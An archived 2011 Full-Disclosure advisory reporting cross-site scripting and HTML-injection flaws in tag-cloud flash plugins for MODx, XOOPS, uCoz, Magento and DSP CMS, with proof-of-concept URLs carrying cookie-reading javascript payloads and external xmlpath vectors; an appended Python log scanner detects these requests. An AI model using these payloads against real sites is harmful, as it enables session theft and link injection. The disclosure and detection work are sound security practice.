lists.openwall.net: Open Source and information security mailing list archives
Date: Mon, 26 Dec 2011 20:53:52 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Vulnerabilities in plugins for MODx CMS, XOOPS, uCoz, Magento and DSP CMS

Hello list!

Besides tens of millions of vulnerable web sites with affected flash files and
multiple vulnerable plugins for different engines, which I've written about
earlier, there are a lot of other vulnerable plugins. Here are new ones
(some of them are vulnerable to two XSS holes). There are Cross-Site
Scripting vulnerabilities in plugins for the engines MODx CMS, XOOPS, uCoz,
Magento and DSP CMS, which are all ports of WP-Cumulus. A lot of other such
plugins for other engines can be vulnerable.

This XSS is similar to the XSS vulnerability in WP-Cumulus, which I disclosed
in 2009 (http://securityvulns.com/Wdocument842.html), because these plugins
are using tagcloud.swf made by the author of WP-Cumulus. I wrote about such
vulnerabilities in 2009-2011; in particular, the millions of flash files
tagcloud.swf which are vulnerable to XSS attacks I mentioned in my
article "XSS vulnerabilities in 34 million flash files"
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Tagcloud for MODx CMS.

Vulnerable is Cumulus for XOOPS 1.0, which is also included in
ExtendedPackRU for XOOPS.

Vulnerable are all versions of uCoz-Cumulus for uCoz.

Vulnerable are all versions of Cumulus Tagcloud for Magento.

Vulnerable are all versions of Cumulus for DSP CMS.

Some of these plugins are vulnerable to one and some to two XSS holes: to the
first hole in WP-Cumulus, which I disclosed in 2009, and to the second
hole, which I disclosed in 2011.

Besides these ones and those which I disclosed in 2009-2011, a lot of
other such plugins for other engines can be vulnerable.

----------
Details:
----------

XSS (WASC-08):

Tagcloud for MODx CMS:

http://site/assets/files/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Cumulus for XOOPS:

http://site/modules/cumulus/include/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

uCoz-Cumulus for uCoz:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Cumulus Tagcloud for Magento:

http://site/frontend/tag/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/frontend/tag/tagcloud.swf?xmlpath=xss.xml

http://site/frontend/tag/tagcloud.swf?xmlpath=http://site/xss.xml

Via the parameters mode and xmlpath.

Cumulus for DSP CMS:

http://site/engine/tags/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

The code will execute after a click. It's strictly social XSS
(http://websecurity.com.ua/5476/). It's also possible to conduct (as in
WP-Cumulus) an HTML Injection attack.

-------------------------------------------------
Plugins with fixed version of swf-file:
-------------------------------------------------

Because in November 2009, after my informing, Roy Tanck (developer of
WP-Cumulus) fixed only the XSS vector, but not the HTML Injection vector, it's
still possible to conduct HTML Injection attacks (for injecting arbitrary
links) against all versions of this swf-file (which can be found under the
name tagcloud.swf and other names), including the fixed version of the
swf-file with the XSS hole fixed.

So all those plugins whose developers fixed this vulnerability (after my
informing or by informing from Roy or other people) by updating the swf-file
are still vulnerable to HTML Injection. These five plugins are using a
non-fixed version of the swf-file.

I mentioned these vulnerabilities on my site:
http://websecurity.com.ua/5601/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
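As an added detection example (not part of the advisory above), the following Python scans web-server access-log lines for the two vectors the post describes: tag XML supplied in the query string of tagcloud.swf / cumulus.swf (a script-scheme href, or any injected markup, which even the "fixed" swf still renders as arbitrary links) and an xmlpath that points the swf at a foreign XML file. The sample log lines, IP addresses and label names are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from the advisory); 203.0.113.x / 198.51.100.x are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Dec/2011:20:53:52 +0200] "GET /assets/files/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1" 200 31502
203.0.113.5 - - [26/Dec/2011:20:54:10 +0200] "GET /frontend/tag/tagcloud.swf?xmlpath=http://203.0.113.77/xss.xml HTTP/1.1" 200 31502
198.51.100.7 - - [26/Dec/2011:20:55:00 +0200] "GET /frontend/tag/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27http://198.51.100.7/%27%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1" 200 31502
198.51.100.9 - - [26/Dec/2011:20:56:00 +0200] "GET /assets/files/tagcloud.swf HTTP/1.1" 200 31502
198.51.100.9 - - [26/Dec/2011:20:57:00 +0200] "GET /index.php?id=3 HTTP/1.1" 200 8831
"""

# Common Log Format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# The swf names the advisory lists (tagcloud.swf / cumulus.swf), wherever the plugin installs them.
SWF_RE = re.compile(r'/(?:tagcloud|cumulus)\.swf$', re.IGNORECASE)
# href pointing at a script-capable scheme inside the injected <tags> markup.
SCRIPT_HREF_RE = re.compile(r'href\s*=\s*[\'"]?\s*(?:javascript|vbscript|data)\s*:', re.IGNORECASE)
# Absolute or protocol-relative xmlpath: the swf would fetch its tag XML from a foreign host.
ABSOLUTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:|//)', re.IGNORECASE)


def classify_request(target):
    """Label one request target by the vector it matches, or None if it looks benign."""
    parts = urlsplit(target)
    if not SWF_RE.search(parts.path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    xmlpaths = params.get('xmlpath')
    if xmlpaths:
        return 'external_xml' if ABSOLUTE_RE.match(xmlpaths[0]) else 'xmlpath_override'
    for cloud in params.get('tagcloud', []):
        decoded = unquote(cloud)  # parse_qs decoded once; a second pass catches double-encoding
        if SCRIPT_HREF_RE.search(decoded):
            return 'xss_script_uri'
        if '<' in decoded:
            return 'html_injection'  # arbitrary link/markup, accepted even by the "fixed" swf
    return None


def scan_log(text):
    """Return (client_ip, target, label) for every request that matches a vector."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            label = classify_request(m.group('target'))
            if label:
                findings.append((m.group('ip'), m.group('target'), label))
    return findings
```

Feed a real access log to scan_log to get the labelled hits; a plain request for the swf without tagcloud or xmlpath in the query string is left alone.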
